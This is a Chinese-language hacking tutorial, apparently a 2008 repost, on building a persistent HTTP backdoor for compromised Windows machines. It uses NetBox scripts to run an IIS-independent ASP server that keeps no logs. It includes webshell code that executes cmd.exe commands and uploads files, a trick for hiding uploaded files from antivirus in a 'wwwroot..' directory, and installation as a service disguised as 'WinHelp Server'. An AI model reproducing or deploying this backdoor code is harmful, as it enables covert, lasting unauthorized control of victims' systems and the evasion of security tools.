教你轻轻松松拥有自己的超级HTTP后门
2008-02-23 07:18:12来源:互联网 阅读 ()
在当今微软当道的年代,找肉鸡已经不是什么难事,各种各样的傻瓜工具大大方便了菜鸟们的入侵,但是往往入侵成功了,怎么去做好后门,把肉鸡尽可能久的抓住往往困惑着像我一样的菜鸟们。用过无数网上经典的后门后,在丢失了n多辛辛苦苦弄到的肉鸡后,我下定决心要写自己的后门。于是有了下面的文章。
二:netbox简介
一个偶然的机会,我认识了netbox。netbox是北京综艺达公司出品的一个使用脚本语言进行应用软件开发与发布的开发环境和运行平台,使用 NetBox,可以完全使用脚本语言(比如 VBScript,Javascript) 创建出稳定高效的应用软件,并且可以平滑移植到从 Windows 98 到 Windows .NET Server 的全部操作系统上。
它可以方便的将asp应用编译成为独立运行的执行程序,完全摆脱iis的束缚(将iis卸载后程序运行仍然正常),在几乎所有的Windows版本上面直接运行,完全不需要考虑平台兼容性和对asp运行环境的要求。同时NetBox还提供大量扩展部件,使得WEB应用更加方便。说了那么多,大家肯定很想见识见识这位帅哥吧,好。
三:一起动手
如果大家已经对脚本语言VBScript或者Javascript有一点了解,那就可以跟我动手了。我们的任务是在建立一个与iis完全无关的web服务器,它可以为我们提供FSO的支持,以方便上传文件。并支持脚本宿主WSH,这样我们就能执行命令了。在网站根目录里我们可以放上自己的asp木马或其它的木马后门并可以随时执行。
首先需要建立我们的web服务器,这个服务器和IIS没有任何关系,即使卸载了IIS它也可以运行。利用NetBox的HttpServer对象就能轻易的办到。
在记事本里写入如下几行代码:
Set httpd = CreateObject("NetBox.HttpServer")
*创建httpserver对象
If httpd.Create("", 8000) = 0 Then
*web服务端口设为8000,可以自己改,不要和其他端口冲突就行了。
Set host = httpd.AddHost("", "\wwwroot")
*设置web服务的根目录为文件夹"wwwroot"。
host.EnableScript = true
*使Web服务器能够理解服务器端脚本程序,既支持asp。
host.AddDefault "default.asp"
host.AddDefault "default.htm"
host.AddDefault "index.asp"
host.AddDefault "index.htm"
host.AddDefault "default.html"
host.AddDefault "index.html"
*设置缺省文件,相当与iis中的默认文档。
httpd.Start
*开始服务
else
httpd.Stop
Shell.Quit 0
End If
End Sub
将文件存为main.box。
这样一个支持asp的服务器源代码就写成功了,它可以让你的asp木马随心所欲的运行,而且不用担心会有日志记录,但是现在它还远不是一个后门,只是提供了与IIS相当的功能,为了防止后门被杀,我们不妨自己来写一个简单的CMD.ASP,当然不是那个所谓的最简短的asp后门了。我们要实现的功能是可以上传文件和执行命令。
这里只分析主要的代码,详细的代码附在了软件包里。
set pyeWSH=server.createobject("WSCRIPT.SHELL")
*建立shell(wshshell)对象pyeWSH
set pyeFSO=server.createobject("scripting.filesystemobject")
*建立文件系统对象pyeFSO用于文件方面的操作
szTempFile="C:\"& pyeFSO.GetTempName()
*GetTempName()是fso建立临时文件的一种方法
Call pyeWSH.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)
*调用wshshell的run方法来执行命令,并把结果重定向到临时文件中
set oFile=pyeFSO.OpenTextFile(szTempFile,1,False,0)
*以读的方式打开临时文件
思路应该很清楚,我简单说说。建立shell对象是用于执行命令,建立文件系统对象是用于将命令执行的结果输入到一个临时文件中并将文件内容读出来。要看到命令执行的结果只要加上这样一句:
response.write server.HTMLEncode(oFile.ReadAll)
就能读出临时文件的内容并显示出来。
实现上传文件功能的代码也很简单。
主要代码如下,详细代码可以看我做好的完整的后门。
注意这里是将上传的文件保存到了肉鸡上的一个“wwwroot.”的文件夹下面,这个文件夹只能在CMD下面用mkdir wwwroot..\ 建立。放在这个文件夹里的文件在一般情况下是看不到的,所以可以在一定程度上躲过杀毒软件的查杀,不过执行的时候也要麻烦一点了,因为放在这里面的程序用shell对象的run方法运行不了的,因为根本找不到这个要执行的文件。但奇怪的是可以将里面的文件copy到别的地方,所以需要执行时就是先要将文件copy到其它目录下,当然啦这么简单的事我们的后门完全可以做到。
asp后门就这样做好了,很简单吧?而且功能也不差,如果你够懒的话,也可以直接用别人的asp后门。
然后我们将web服务器做成一个真正的服务,也就是可以随系统一起启动,只需要加上这样一句:
Shell.Service.RunService "WinHelp Server", "WinHelp Server","Windows Help service "
引号内依次为服务名,服务显示名,服务描述字符串,可以发挥想象自己改。
安装服务的命令是:myapp -install,要注意的是这个命令只是将程序变成服务,并没有运行,所以要马上生效的话,就要输入myapp.exe以执行它。
卸载服务的命令是:myapp -remove,myapp表示文件的名称。
四:编译应用程序
没想到还有这一步吧?像一般的编译程序一样,源文件要变异了才能执行,编译需要使用工具nbdw.exe,这个工具用于将NetBox 应用发布成为独立的应用程序,在netbox的官方网站(www.netbox.cn)就有下载的。但是使用前需要注册成为netbox程序员社区成员。界面如图一:
点击选择源文件夹,找到我们存放源文件的目录,勾选要编译的文件,在输出文件里填上要生成的执行文件名,如pyedoor.exe,点 Build...,开始编译。
最后,我们得到了编译成功的那个可执行文件,使用时需要上传到远程主机上,执行pyedoor -install,就将后门以服务方式运行了,访问时只需在浏览器里输入www.target.com:8000/cmd.asp就可以看到我们的木马了。如图二:
相信熟悉网页木马的高手们不用我罗嗦了吧?但是要注意的是这个网页木马是将上传的文件放在“wwwroot..\”目录下的,即使在command框里输入dir wwwroot..\也看不到上传的文件,也执行不了,目的在于防止被杀。那万一需要执行该怎么办呢?聪明的你肯定想到了吧,对了,只要copy“wwroot..\”目录下的文件到别的文件夹下就行了。怎么样很简单吧?原来拥有自己的后门这么容易。
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash